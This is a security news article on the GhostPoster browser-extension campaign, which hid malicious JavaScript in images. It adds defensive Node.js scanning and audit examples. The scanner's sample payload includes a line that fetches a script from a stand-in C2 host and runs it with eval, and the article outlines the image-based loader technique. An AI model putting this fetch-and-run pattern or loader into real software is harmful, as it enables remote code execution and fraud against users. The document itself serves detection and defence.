GhostPoster: 17 browser extensions hid malware in images to steal clicks and commissions


The story repeats itself in a more sophisticated variant: security researchers have discovered a new set of 17 browser extensions linked to the campaign known as GhostPoster, which together accumulated about 840,000 installs before being removed from the official stores. What is striking is not only the volume but the technique the attackers used: malicious code camouflaged inside images and other files bundled with the extensions themselves, with a phased execution flow designed to evade both static and behavioural controls.

The first alarm was raised by Koi Security analysts at the end of last year, when they described extensions that hid malicious JavaScript inside their icons. Once activated, that code downloaded additional payloads from external resources, monitored browsing activity, manipulated affiliate links on large e-commerce platforms and mounted invisible iframes to generate click and advertising fraud. If you want to see the work behind that first finding, start with the Koi Security page at koi.security, where they publish research and notices about malicious extension campaigns.


A new report from the browser security platform LayerX confirms that the campaign was not extinguished after the initial exposure and details the 17 extensions involved in this round, many with names that mimic legitimate functions such as translators, ad blockers or video download tools. LayerX found that some of these add-ons had been in the official repositories for years, with a documented presence since 2020, which suggests a long-running operation that managed to stay under the radar. You can read the LayerX analysis on its official site at layerx.ai, where it explains the technical evolution of GhostPoster.

Among the technical developments LayerX highlights is the move towards a more robust multi-phase execution: in addition to hiding code in icons, the attackers began packing the malicious payload inside images bundled with the extension and moved the staging logic into the extension's own background script. At runtime, that script reads the raw bytes of the image looking for a specific delimiter (the report cites the sequence "> > > >"), extracts the hidden data that follows it, stores it temporarily and then decodes it from Base64 to run it as JavaScript. This mechanism lengthens the dwell time before activation and complicates detection by tools that analyse only visible content or the most obvious files: an image that renders normally can still carry extra bytes that no image viewer ever looks at.
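What that extraction step looks like in practice, and how a defender can turn it around, as an added example that is not code from the article, LayerX or Koi Security: the functions below do what the report says the loader does (read an image's raw bytes, find the delimiter, take what follows and Base64-decode it) but only return the decoded text instead of executing it, and add a second check that needs no delimiter at all: whether a PNG carries any bytes after its IEND chunk, which a well-formed image never does. The delimiter ">>>>" (the page quotes it as "> > > >"; the exact bytes are an assumption), the sample files and the inert stub payload are all constructed for the demo; Node.js with no third-party modules is assumed.

```javascript
// Added example (not LayerX's or Koi Security's code). Scans extension
// files for a payload hidden after image data, mirroring the loader's
// read-bytes / find-delimiter / Base64-decode sequence, but only reports
// what it finds. Assumes Node.js >= 16; the ">>>>" delimiter is assumed.

const PNG_SIGNATURE = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
// Last 8 bytes of every well-formed PNG: the "IEND" chunk type and its fixed CRC.
const PNG_IEND = Buffer.from([0x49, 0x45, 0x4e, 0x44, 0xae, 0x42, 0x60, 0x82]);
const DELIMITER = Buffer.from('>>>>'); // assumed form of the reported delimiter

// Bytes after the last IEND chunk, or null if the buffer is not a PNG or
// ends exactly where a clean PNG should.
function trailingBytesAfterPng(buf) {
  if (buf.length < 8 || !buf.subarray(0, 8).equals(PNG_SIGNATURE)) return null;
  const end = buf.lastIndexOf(PNG_IEND);
  if (end === -1) return null;
  const tail = buf.subarray(end + PNG_IEND.length);
  return tail.length > 0 ? tail : null;
}

// Mirror the loader's extraction: find the delimiter, take the rest,
// Base64-decode it. Returns the decoded text or null. The Base64 shape
// check keeps a random 0x3E3E3E3E inside real pixel data from being reported.
function extractHiddenPayload(buf, delimiter = DELIMITER) {
  const idx = buf.indexOf(delimiter);
  if (idx === -1) return null;
  const encoded = buf.subarray(idx + delimiter.length).toString('latin1').trim();
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(encoded)) return null;
  return Buffer.from(encoded, 'base64').toString('utf8');
}

// files: { relativePath: Buffer }, as read from an unpacked extension.
// Returns one finding per image that has trailing data or a decodable payload.
function scanExtensionFiles(files) {
  const findings = [];
  for (const [name, buf] of Object.entries(files)) {
    if (!/\.(png|ico|jpe?g|gif|webp)$/i.test(name)) continue;
    const tail = trailingBytesAfterPng(buf);
    const payload = extractHiddenPayload(buf);
    if (tail || payload) {
      findings.push({
        file: name,
        trailingBytes: tail ? tail.length : 0,
        payloadPreview: payload ? payload.slice(0, 80) : null,
      });
    }
  }
  return findings;
}

// Constructed sample: a minimal PNG, then the same PNG with the delimiter and
// a Base64-encoded stub appended. The stub is inert text, not real malware.
function buildSampleExtension() {
  const stub = "fetch('https://c2.example.invalid/stage2.js').then(r => r.text()).then(eval)";
  const cleanPng = Buffer.concat([
    PNG_SIGNATURE,
    Buffer.from('0000000d49484452', 'hex'), // IHDR chunk header (length 13)
    Buffer.alloc(13 + 4),                   // IHDR body and CRC (zeros; not validated here)
    Buffer.from('00000000', 'hex'),         // IEND chunk length
    PNG_IEND,
  ]);
  const trojanizedPng = Buffer.concat([
    cleanPng, DELIMITER, Buffer.from(Buffer.from(stub).toString('base64')),
  ]);
  return {
    'icons/icon128.png': trojanizedPng,
    'icons/icon16.png': cleanPng,
    'background.js': Buffer.from('// in the real campaign the staging logic lives here'),
  };
}

const report = scanExtensionFiles(buildSampleExtension());
console.log(JSON.stringify(report, null, 2));
```

Run it against an unpacked extension by reading every file under the directory into the same `{ path: Buffer }` shape; the IEND check is the more reliable of the two signals because it does not depend on guessing the delimiter, while the delimiter check is what tells you the trailing bytes are a script rather than, say, a harmless metadata trailer.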

The purpose of this payload is varied and harmful: persistent monitoring of the pages the victim visits, redirecting or rewriting affiliate links to steal commissions, and the invisible insertion of iframes that generate fraudulent impressions and clicks. All of these actions affect not only the victim's privacy but can also cause economic losses to users, businesses and advertising networks. LayerX stresses that the modularity and stealth of the new pattern allow longer dormancy and greater resistance to both static and dynamic filters.

The official platforms have reacted: according to news reports, Mozilla and Microsoft have already removed the identified extensions from their stores, and Google confirmed the removal of the affected versions from the Chrome Web Store. BleepingComputer covered the takedown and Google's statements; its site is a good reference for following the outcome and seeing which specific extensions were removed: bleepingcomputer.com. Still, removing an extension from a store does not remove it from the browsers of those who already installed it, so the risk persists for users with existing installations.

If you are worried that you installed any of these extensions, or notice any other strange behaviour in your browser, there are concrete and useful actions you can take immediately. First, review the list of installed extensions and remove any add-on you do not recognise or need. Browsers offer extension management pages with step-by-step guides: for Chrome see Google's help at support.google.com, for Firefox the Mozilla documentation at support.mozilla.org, and for Edge the Microsoft instructions at support.microsoft.com. After removing the extension, it is advisable to delete any local data tied to extensions (where the browser allows it), clear cache and cookies, and, if you suspect sensitive data may have been compromised, rotate passwords and review the access tied to important accounts.


In more serious scenarios it is also appropriate to run an up-to-date anti-malware scan, review transactions and unusual activity in services tied to your browsing (online accounts, affiliate programmes, etc.), and, if the extension had extensive permissions, consider creating a new browser profile or even migrating your data to a clean installation to avoid persistent leftovers. Teams and administrators should audit the extensions installed on corporate devices, enforce policies that limit installation to verified add-ons only, and monitor network logs for communications with the suspicious domains used to download the payloads.
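One way an administrator could do that audit in code, as an added example that is not the article's, LayerX's or any browser vendor's tooling: it takes the manifests of the extensions found on a device, flags the traits the GhostPoster loader depends on (a background script or service worker, broad host access, permissions that allow page or traffic rewriting, and image files large enough to hide a payload), compares each extension ID with an allowlist, and emits the Chrome/Edge ExtensionSettings policy that blocks everything not on that list. The extension IDs, manifests and the 64 KB image threshold are constructed placeholders; Node.js with no third-party modules is assumed.

```javascript
// Added example (not from the article or any vendor). Audits an inventory
// of installed extensions against an allowlist and the traits the
// GhostPoster loader relies on, then builds the matching ExtensionSettings
// policy. IDs, manifests and thresholds below are constructed for the demo.

// Permissions that let an extension rewrite pages or traffic; affiliate-link
// swapping and iframe injection need at least one of these.
const RISKY_PERMISSIONS = new Set([
  'scripting', 'webRequest', 'webRequestBlocking', 'declarativeNetRequest', 'tabs', 'webNavigation',
]);
// Host patterns that grant access to every site.
const BROAD_HOSTS = [/^<all_urls>$/, /^\*:\/\/\*\/\*?$/, /^https?:\/\/\*\/\*?$/];
const IMAGE_SIZE_LIMIT = 64 * 1024; // assumed: icons are normally a few KB

function hasBackgroundCode(manifest) {
  const bg = manifest.background || {};
  return Boolean(bg.service_worker || (Array.isArray(bg.scripts) && bg.scripts.length > 0));
}

function hasBroadHostAccess(manifest) {
  const hosts = [...(manifest.host_permissions || []), ...(manifest.permissions || [])]
    .concat((manifest.content_scripts || []).flatMap(cs => cs.matches || []));
  return hosts.some(h => BROAD_HOSTS.some(re => re.test(h)));
}

// ext: { id, manifest, files: { relativePath: sizeInBytes } }
function assessExtension(ext, allowlist) {
  const reasons = [];
  if (!allowlist.has(ext.id)) reasons.push('not on allowlist');
  if (hasBackgroundCode(ext.manifest)) reasons.push('background script or service worker');
  if (hasBroadHostAccess(ext.manifest)) reasons.push('broad host access');
  const risky = (ext.manifest.permissions || []).filter(p => RISKY_PERMISSIONS.has(p));
  if (risky.length) reasons.push('risky permissions: ' + risky.join(', '));
  const bigImages = Object.entries(ext.files || {})
    .filter(([p, size]) => /\.(png|ico|jpe?g|gif|webp)$/i.test(p) && size > IMAGE_SIZE_LIMIT)
    .map(([p]) => p);
  if (bigImages.length) reasons.push('oversized images: ' + bigImages.join(', '));
  return { id: ext.id, name: ext.manifest.name, reasons };
}

// Only extensions with at least one reason are returned.
function auditExtensions(installed, allowlist) {
  return installed.map(e => assessExtension(e, allowlist)).filter(r => r.reasons.length > 0);
}

// Chrome/Edge "ExtensionSettings" policy: default everything to blocked and
// allow only the listed IDs, so store removals are not the only line of defence.
function buildExtensionSettingsPolicy(allowlist) {
  const policy = { '*': { installation_mode: 'blocked' } };
  for (const id of allowlist) policy[id] = { installation_mode: 'allowed' };
  return policy;
}

// Constructed sample inventory; the IDs are placeholders, not real extensions.
const ALLOWLIST = new Set(['aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa']);
const INSTALLED = [
  {
    id: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
    manifest: { name: 'Corp SSO helper', manifest_version: 3,
      permissions: ['storage'], host_permissions: ['https://sso.corp.example/*'] },
    files: { 'icon48.png': 2048 },
  },
  {
    id: 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb',
    manifest: { name: 'Free Translator', manifest_version: 3,
      background: { service_worker: 'bg.js' },
      permissions: ['scripting', 'storage'], host_permissions: ['<all_urls>'] },
    files: { 'icon128.png': 180 * 1024, 'bg.js': 900 },
  },
];

console.log(JSON.stringify(auditExtensions(INSTALLED, ALLOWLIST), null, 2));
console.log(JSON.stringify(buildExtensionSettingsPolicy(ALLOWLIST), null, 2));
```

In a real deployment the inventory comes from each profile's extensions directory (manifest.json plus file sizes) or from the browser's own reporting; a background script with broad host access is common in legitimate extensions too, so treat the reasons as triage signals to be paired with the allowlist rather than as a verdict on their own.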

The GhostPoster case highlights two important lessons: on the one hand, the importance of not letting your guard down with seemingly harmless extensions (a translator or an image downloader can become an attack vector), and on the other, the need for continuous improvement in the oversight of extension stores and in the defences that detect code hidden in binaries and images. If you want to dig deeper into the modus operandi and the technical recommendations, the public reports from Koi Security and LayerX are a good starting point, and specialised outlets such as BleepingComputer follow up on the remediation in the stores.

The final invitation is simple: check your extensions calmly, remove the unnecessary ones and keep your browser up to date. Extensions make our lives easier, but they also open a door if we do not manage them with care.
